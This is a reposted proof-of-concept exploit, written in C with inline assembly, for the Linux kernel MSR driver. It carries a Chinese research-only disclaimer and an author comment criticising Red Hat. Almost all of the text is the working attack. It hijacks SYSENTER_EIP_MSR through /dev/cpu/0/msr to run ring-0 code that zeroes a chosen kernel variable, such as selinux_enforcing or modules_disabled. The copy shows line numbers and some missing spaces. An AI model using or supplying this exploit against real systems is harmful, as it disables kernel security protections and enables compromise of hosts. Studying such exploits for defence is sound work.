Linux Kernel 'MSR' Driver Local Privilege Escalation

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  25. #define _GNU_SOURCE
  26. #include<stdio.h>
  27. #include<sched.h>
  28. #include<unistd.h>
  29. #include<sys/types.h>
  30. #include<sys/stat.h>
  31. #include<fcntl.h>
  32. #include<stdlib.h>
  33. #include<sys/time.h>
  34. #include<sys/resource.h>
  35. #include<sys/mman.h>
  37. #define SYSENTER_EIP_MSR 0x176
  39. u_int64_t msr;
  41. unsignedlong ourstack[65536];
  43. u_int64_t payload_data[16];
  45. externvoid*_ring0;
  46. externvoid*_ring0_end;
  48. void ring0(void)
  49. {
  50. __asm volatile(".globl _ring0 "
  51. "_ring0: "
  52. ".intel_syntax noprefix "
  53. ".code64 "
  54. // set up stack pointer with 'ourstack'
  55. "mov esp, ecx "
  56. // save registers, contains the original MSR value
  57. "push rax "
  58. "push rbx "
  59. "push rcx "
  60. "push rdx "
  61. // play with the kernel here with interrupts disabled!
  62. "mov rcx, qword ptr [rbx+8] "
  63. "test rcx, rcx "
  64. "jz skip_write "
  65. "mov dword ptr [rcx], 0 "
  66. "skip_write: "
  67. // restore MSR value before returning
  68. "mov ecx, 0x176 "// SYSENTER_EIP_MSR
  69. "mov eax, dword ptr [rbx] "
  70. "mov edx, dword ptr [rbx+4] "
  71. "wrmsr "
  72. "pop rdx "
  73. "pop rcx "
  74. "pop rbx "
  75. "pop rax "
  76. "sti "
  77. "sysexit "
  78. ".code32 "
  79. ".att_syntax prefix "
  80. ".global _ring0_end "
  81. "_ring0_end: "
  82. );
  83. }
  85. unsignedlong saved_stack;
  87. int main(int argc,char*argv[])
  88. {
  89. cpu_set_tset;
  90. int msr_fd;
  91. int ret;
  92. u_int64_t new_msr;
  93. struct sched_param sched;
  94. u_int64_t resolved_addr =0ULL;
  96. if(argc ==2)
  97. resolved_addr = strtoull(argv[1], NULL,16);
  99. /* can do this without privilege */
  100. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  101. mlock(&payload_data,sizeof(payload_data));
  103. CPU_ZERO(&set);
  104. CPU_SET(0,&set);
  106. sched.sched_priority =99;
  108. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  109. if(ret){
  110. fprintf(stderr,"Unable to set priority. ");
  111. exit(1);
  112. }
  114. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  115. if(ret){
  116. fprintf(stderr,"Unable to set affinity. ");
  117. exit(1);
  118. }
  120. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  121. if(msr_fd <0){
  122. msr_fd = open("/dev/msr0", O_RDWR);
  123. if(msr_fd <0){
  124. fprintf(stderr,"Unable to open /dev/cpu/0/msr ");
  125. exit(1);
  126. }
  127. }
  128. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  129. ret = read(msr_fd,&msr,sizeof(msr));
  130. if(ret !=sizeof(msr)){
  131. fprintf(stderr,"Unable to read /dev/cpu/0/msr ");
  132. exit(1);
  133. }
  135. // stuff some addresses in a buffer whose address we
  136. // pass to the "kernel" via register
  137. payload_data[0]= msr;
  138. payload_data[1]= resolved_addr;
  140. printf("Old SYSENTER_EIP_MSR = %016llx ", msr);
  141. fflush(stdout);
  143. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  144. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  146. printf("New SYSENTER_EIP_MSR = %016llx ", new_msr);
  147. fflush(stdout);
  149. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  150. if(ret !=sizeof(new_msr)){
  151. fprintf(stderr,"Unable to modify /dev/cpu/0/msr ");
  152. exit(1);
  153. }
  155. __asm volatile(
  156. ".intel_syntax noprefix "
  157. ".code32 "
  158. "mov saved_stack, esp "
  159. "lea ecx, ourstack "
  160. "lea edx, label2 "
  161. "lea ebx, payload_data "
  162. "sysenter "
  163. "label2: "
  164. "mov esp, saved_stack "
  165. ".att_syntax prefix "
  166. );
  168. printf("Success. ");
  170. return0;
  171. }
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/security4399/p/3239649.html